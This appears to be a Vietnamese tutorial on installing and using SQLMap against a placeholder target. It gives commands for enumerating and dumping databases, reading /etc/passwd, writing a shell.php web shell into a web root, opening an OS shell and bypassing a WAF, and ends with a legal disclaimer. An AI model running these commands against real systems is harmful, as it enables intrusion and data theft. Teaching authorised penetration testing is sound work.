SQLMap: Công cụ tự động khai thác SQL Injection hàng đầu
SQLMap là một công cụ kiểm tra thâm nhập mã nguồn mở, viết bằng Python, giúp tự động hóa quá trình phát hiện và khai thác lỗ hổng SQL Injection. Đây là "vũ khí" không thể thiếu của bất kỳ chuyên gia bảo mật hay pentester nào.
📌 Dự án chính thức: github.com/sqlmapproject/sqlmap
1. Cài đặt SQLMap từ GitHub
Để có phiên bản mới nhất, bạn nên clone trực tiếp từ kho lưu trữ chính thức:
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev cd sqlmap-dev python sqlmap.py -h
2. Các lệnh SQLMap cơ bản
▸ Liệt kê tất cả cơ sở dữ liệu
python sqlmap.py -u "http://target.com/page.php?id=1" --dbs
▸ Liệt kê bảng trong một database
python sqlmap.py -u "http://target.com/page.php?id=1" -D database_name --tables
▸ Liệt kê cột trong một bảng
python sqlmap.py -u "http://target.com/page.php?id=1" -D database_name -T table_name --columns
▸ Trích xuất dữ liệu (dump)
python sqlmap.py -u "http://target.com/page.php?id=1" -D database_name -T table_name -C col1,col2 --dump
3. Giải thích các tham số quan trọng
-u– URL đích--dbs– Liệt kê cơ sở dữ liệu-D– Chọn database--tables– Liệt kê bảng-T– Chọn bảng--columns– Liệt kê cột-C– Chọn cột--dump– Trích xuất dữ liệu
4. Các tính năng nâng cao
- Đọc file trên máy chủ:
--file-read=/etc/passwd - Ghi file lên máy chủ:
--file-write shell.php --file-dest /var/www/html/shell.php - Lấy shell tương tác:
--os-shell - Bypass WAF:
--tamper=space2comment
⚠️ Lưu ý pháp lý: Bài viết chỉ nhằm mục đích giáo dục và nâng cao nhận thức bảo mật. Việc sử dụng SQLMap để tấn công hệ thống khi chưa được phép là vi phạm pháp luật. Hãy luôn là một hacker mũ trắng.
Tham khảo thêm tại GitHub SQLMap | #SQLMap #Pentesting #BugBounty
Tiếng Việt
English
中文
한국어
日本語
Français
Deutsch
Русский